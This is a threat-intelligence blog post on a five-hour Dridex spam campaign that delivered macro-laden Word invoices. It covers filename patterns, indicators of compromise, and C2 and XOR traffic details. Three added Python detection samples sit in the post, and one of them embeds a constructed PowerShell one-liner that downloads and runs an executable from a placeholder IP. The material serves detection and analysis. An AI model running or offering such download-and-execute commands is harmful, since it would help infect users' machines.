This post was authored by Nick Biasini with contributions from Kevin Brooks.
Overview
The use of macro-enabled Word documents has exploded over the last year, with Dridex being a primary example payload. Last week, Talos researchers identified another short-lived spam campaign that was delivering a new variant of Dridex. This particular campaign lasted less than five hours and mutated both the subject lines and the attachment names to avoid detection. The five-hour campaign actually consisted of two separate emails, both carrying malicious Word documents as attachments. A sample of the two different subject lines is shown below.
Campaign One Subject:
Debit Note [97994] information attached to this email
Campaign Two Subject:
48142 - Your Latest Documents from RS Components 822379272
*Note: Italicized text is used to identify the mutating portions of the email subject.
Both campaigns centered on invoices being sent as Word document attachments. Not only did the attackers use a different subject for every email, they also rarely reused an attachment name. Less than five percent of the emails observed contained reused attachment names.
Campaign One
Sample Email from First Dridex Spam Campaign. Note it has a blank body.
The emails used a unique sender address, subject, and attachment name for each spam message sent. Each attachment was a Word document whose filename consisted of eight random digits. Below are a few of the sample file names observed in Talos telemetry data.
- 79198977.doc
- 33713908.doc
- 36917816.doc
- 25372173.doc
- 51230292.doc
- 74953293.doc
One odd characteristic of this campaign was that the body of the email itself was completely blank. However, if a user did open the attachment, they were presented with a Word document with no legible text, similar to what is shown below.
Example of Malicious Word Document
Behind the scenes, a macro used cmd.exe to launch PowerShell, which downloaded and executed a malicious executable from a hard-coded IP address.
Dropper Download Example
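The cmd.exe-to-PowerShell chain described above is straightforward to hunt for in process-creation telemetry. The following Python is an added example, not code from this post or from Talos: it walks constructed Sysmon-style process events (parent and child PIDs, image path, command line) and flags any shell launched beneath an Office process whose command line fetches something from a bare IP address. The event layout, the download keyword list, and the 203.0.113.10 placeholder URL are assumptions made for the example.

```python
"""Flag Office-launched shells that download from a hard-coded IP address.

Added example, not Talos code. Scans constructed Sysmon-style process
creation events (Event ID 1 fields reduced to pid, ppid, image, cmdline)
for the chain described in the post: Word -> cmd.exe -> powershell.exe
fetching an executable from an IP-address URL.
"""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# URL whose host is a bare IPv4 address (optionally with a port)
IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/[^\s'\"]*", re.IGNORECASE)
# PowerShell/cmd fragments that fetch content (assumed list, extend as needed)
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "webclient",
                  "invoke-webrequest", "start-bitstransfer", "bitsadmin")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def _basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def office_ancestry(event, by_pid):
    """Return the chain of process names from the nearest Office parent down to
    this event, or None if no Office process is an ancestor."""
    chain = [_basename(event.image)]
    cur = event
    while cur.ppid in by_pid:
        cur = by_pid[cur.ppid]
        chain.append(_basename(cur.image))
        if _basename(cur.image) in OFFICE_PARENTS:
            return list(reversed(chain))
    return None


def find_macro_downloaders(events):
    """Return one hit per shell process that (a) descends from an Office process
    and (b) has a download keyword plus an IP-address URL on its command line."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if _basename(e.image) not in SHELLS:
            continue
        chain = office_ancestry(e, by_pid)
        if chain is None:
            continue
        lowered = e.cmdline.lower()
        url = IP_URL.search(e.cmdline)
        if url and any(h in lowered for h in DOWNLOAD_HINTS):
            hits.append({"pid": e.pid, "chain": " -> ".join(chain), "url": url.group(0)})
    return hits


# Constructed PowerShell download one-liner; 203.0.113.10 is a documentation
# address used as a placeholder, not one of the campaign's servers.
PS_DOWNLOAD = (
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
    "\"(New-Object System.Net.WebClient).DownloadFile("
    "'http://203.0.113.10/placeholder/payload.exe', $env:TEMP + '\\payload.exe'); "
    "Start-Process ($env:TEMP + '\\payload.exe')\""
)

# Constructed events, not real telemetry
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\alice\Downloads\79198977.doc"'),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c " + PS_DOWNLOAD),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_DOWNLOAD),
    # benign: shell under Word with no download
    ProcEvent(600, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo test"),
    # same download one-liner but launched by the user session, not an Office macro
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_DOWNLOAD),
    # download from a hostname rather than a bare IP
    ProcEvent(700, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command Invoke-WebRequest https://example.com/update.ps1"),
]

if __name__ == "__main__":
    for hit in find_macro_downloaders(SAMPLE_EVENTS):
        print(hit)
```

Both the cmd.exe process and the PowerShell child it spawns are reported, because each carries the download command line; the shell under Word with no download, the same one-liner run outside an Office ancestry, and a fetch from a hostname rather than an IP are all left alone, which keeps the rule narrow to the pattern the post describes.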
Campaign Two
Sample Email from Second Dridex Spam Campaign
The second campaign looks closer to a legitimate email than the first. It references a specific account and invoice number, with an attached Word document posing as the invoice. When opened, it presents the same basic content shown above, a non-legible Word document whose macro downloads a file using cmd.exe and PowerShell. Both campaigns downloaded the same file from a range of different addresses. Analysis of the samples revealed five unique IP addresses serving the same executable from the same path. All five URLs are listed below:
- hxxp://185.39.149.21/jsaxo8u/g39b2cx.exe
- hxxp://31.41.45.197/jsaxo8u/g39b2cx.exe
- hxxp://185.91.175.64/jsaxo8u/g39b2cx.exe
- hxxp://93.26.217.203/jsaxo8u/g39b2cx.exe
- hxxp://193.26.217.203/jsaxo8u/g39b2cx.exe
The naming convention for the Word documents attached to these emails was slightly different. All files began with “G-A”, followed by 22 random digits, and then a “-1” (i.e. “G-A4123477405172464507071-1.doc”). Below is a list of some of the file names that were seen during the campaign.
- G-A3865729716193015411461-1.doc
- G-A1382739323079843453063-1.doc
- G-A0623523338554327335109-1.doc
- G-A6805305480653463953155-1.doc
- G-A7904953421619636467435-1.doc
- G-A0647500403036858451034-1.doc
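Both naming conventions (eight digits for the first campaign; “G-A”, 22 digits and “-1” for the second) are regular enough to match at a mail gateway or in mail logs. The Python below is an added example, not Talos code: it encodes the two patterns as regular expressions, classifies the file names listed in this post together with a few constructed benign and near-miss names, and computes the share of messages whose attachment name was reused, the figure the post puts under five percent. The label names and the constructed sample names are assumptions.

```python
"""Match attachment names against the two Dridex campaign naming conventions.

Added example, not Talos code. Patterns follow the post: campaign one used
eight random digits plus .doc; campaign two used "G-A", 22 random digits
and "-1.doc". Sample names are those listed in the post plus constructed
benign and near-miss ones.
"""
import re
from collections import Counter

CAMPAIGN_PATTERNS = {
    "dridex_campaign_1": re.compile(r"^\d{8}\.doc$", re.IGNORECASE),
    "dridex_campaign_2": re.compile(r"^G-A\d{22}-1\.doc$", re.IGNORECASE),
}


def classify_attachment(name):
    """Return the campaign label whose pattern the file name matches, else None."""
    for label, pattern in CAMPAIGN_PATTERNS.items():
        if pattern.match(name):
            return label
    return None


def summarize(names):
    """Count matches per pattern and the share of messages whose attachment
    name also appears on another message (the post observed under 5%)."""
    matches = Counter(label for label in map(classify_attachment, names) if label)
    occurrences = Counter(names)
    reused_messages = sum(c for c in occurrences.values() if c > 1)
    reuse_ratio = reused_messages / len(names) if names else 0.0
    return {"matches": dict(matches), "reuse_ratio": reuse_ratio}


# Names from the post's two lists, plus constructed benign and near-miss names
SAMPLE_NAMES = [
    "79198977.doc", "33713908.doc", "36917816.doc",
    "25372173.doc", "51230292.doc", "74953293.doc",
    "G-A3865729716193015411461-1.doc", "G-A1382739323079843453063-1.doc",
    "G-A0623523338554327335109-1.doc", "G-A6805305480653463953155-1.doc",
    "G-A7904953421619636467435-1.doc", "G-A0647500403036858451034-1.doc",
    "79198977.doc",            # constructed repeat of a campaign-one name
    "invoice_march.pdf",       # constructed benign attachment
    "G-A123-1.doc",            # constructed near miss: wrong digit count
    "12345678.docx",           # constructed near miss: wrong extension
]

if __name__ == "__main__":
    print(summarize(SAMPLE_NAMES))
```

The anchored patterns deliberately reject near misses such as a different digit count or a .docx extension, so a gateway rule built on them stays specific to what was actually observed; loosening them (for example to any all-digit .doc name) is a separate tuning decision with its own false-positive cost.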
Dridex Analysis
The PE dropped by the Word document has been identified as a variant of Dridex. Dridex is a banking trojan, an evolution of Cridex, that Talos has covered previously. This particular sample marks the fourth different variation that Talos has analyzed over the last several months. The dropped file copies itself to the local %AppData% folder, creates a mutex, and establishes a connection with the C2 servers over port 8080. Once a connection is established, the host sends an XOR-encrypted message containing the computer name, OS version, and currently installed programs, including version numbers. The C2 server responds with a DLL download, which is written to the infected system as a .tmp file. The DLL is then executed via the command line with a command similar to the following:
'rundll32.exe "C:\DOCUME~1\ADMINI~1\LOCALS~1\APPLIC~1\4A.tmp" NotifierInit'
Upon execution, the Dridex code is injected into Explorer.exe and the original file is deleted. This injected code has C2 capabilities and continues to contact the server. The changes in this variant are primarily associated with this continuing communication and the construction of the HTTP POST requests. The POST header is generated by selecting the User Agent, Content-Type, and Referrer values from a hard-coded list, a couple of examples of which are below:
Sample Header Values from Dridex
The one characteristic unique to this variant is a change associated with the host field. In previous variants the host field was made up of random characters followed by a space and TLD (i.e. m3C2J0e7f7bKBYwq1z org). This variant fixed that and replaced the space with a ‘.’ making it appear closer to a legitimate host (i.e. m3C2J0e7f7bKBYwq1z.org). The actual data that is contained in the body of the POST request is encrypted with a 4-byte XOR key that is created from random bytes during the encryption process. This key is included in the POST message as the first 4 bytes preceding the data to be sent to allow the server to decrypt the data.
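The POST body layout described above (4 random key bytes followed by the XOR-encrypted data) can be undone directly from a captured request, which is what an analyst wants when inspecting this traffic. The following Python is an added example, not Talos code: it builds a constructed body in that layout and recovers the key and plaintext from the first four bytes, plus a printable-ratio check for triaging whether an unknown capture really follows the layout. It assumes the 4-byte key is applied repeatedly across the payload, which the post does not state explicitly; the beacon text and key value are made up for the example.

```python
"""Decode a Dridex-style POST body: 4 random XOR key bytes followed by the
XOR-encrypted payload.

Added example, not Talos code. Assumes the 4-byte key repeats over the
payload (the post only says a 4-byte key prefixes the data). The sample
beacon text and key are constructed.
"""
import os

KEY_LEN = 4


def xor_with_key(data, key):
    """XOR every byte of data with the key, cycling the key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_post_body(plaintext, key=None):
    """Produce a body in the described layout; key defaults to 4 random bytes."""
    key = os.urandom(KEY_LEN) if key is None else key
    if len(key) != KEY_LEN:
        raise ValueError("key must be exactly 4 bytes")
    return key + xor_with_key(plaintext, key)


def decode_post_body(body):
    """Read the key from the first 4 bytes and return (key, plaintext)."""
    if len(body) < KEY_LEN:
        raise ValueError("body is shorter than the 4-byte key prefix")
    key = body[:KEY_LEN]
    return key, xor_with_key(body[KEY_LEN:], key)


def printable_ratio(data):
    """Share of bytes that are printable ASCII or whitespace; a quick triage
    check that a captured body really follows the key-prefix layout."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D))
    return ok / len(data)


# Constructed beacon in the spirit of the host inventory the post describes
SAMPLE_PLAINTEXT = b"computer=WIN7-LAB;os=6.1.7601;programs=Adobe Reader 11.0.10,Java 7u51"
SAMPLE_KEY = bytes.fromhex("a1b2c3d4")   # constructed, not a key seen in the wild
SAMPLE_BODY = encode_post_body(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    key, text = decode_post_body(SAMPLE_BODY)
    print("key:", key.hex(), "printable:", round(printable_ratio(text), 2))
    print(text.decode())
```

Because the key travels with the message, the scheme offers no confidentiality against anyone holding the capture; its only effect is to defeat naive string matching on the wire, which is why a decoder this small is enough to expose the beacon contents for detection content or incident scoping.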
Detection
Detection Graph. Shaded region shows active campaign
Initially, the anti-virus detections were poor for the Word documents, but they did eventually catch up. Since the campaign only lasted for approximately five hours, protection was only available for the tail end of the campaign. This is where a feature like Virus Outbreak Filters (VOF) on the Cisco ESA is important. Using these outbreak filters, messages can be quarantined for up to 12 hours by default, allowing the anti-virus vendors to catch up without the end users being infected. These filters are most effective against known questionable file types, such as .exe, .zip and .scr, but in this case they still provided 0.6 hours of lead time for the first campaign and 3.3 hours of lead time for the second campaign. The dropper itself did have better initial coverage and was detected by a handful of vendors immediately.
To give you an idea of how many of these spam campaigns are occurring on a regular basis, this Dridex campaign is not even in the top 20 campaigns that we are currently tracking.
http://www.senderbase.org/static/malware
In many of these shorter campaigns, the anti-virus update can actually arrive after the campaign has essentially completed, as shown below in a DyrezaC malware campaign that occurred just a couple of weeks back:
Snort Rules: Please refer to Defense Center or snort.org for updated Snort rules.
IOC
Hashes (SHA256)
Malicious Word Documents
Dridex Dropper (SHA256)
7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a
IP Addresses:
185.39.149.21
31.41.45.197
185.91.175.64
93.26.217.203
193.26.217.203
77.74.103.150
199.201.121.169
45.55.154.235
Conclusion
This is another example of how spam campaigns have evolved. Previously, these campaigns continued for days or weeks and used the same subject or attachment name, allowing for quick detection and prevention. Today, these campaigns are short-lived, with mutating subjects and attachments designed specifically to avoid detection and prevention. This continues to emphasize the importance of detection through all layers of infrastructure, including email, web, network and host-based.
Coverage
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.
CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.
The Network Security protection of IPS and NGFW has up-to-date signatures to detect malicious network activity by threat actors.
ESA can block malicious emails, including phishing and malicious attachments, sent by threat actors as part of their campaign.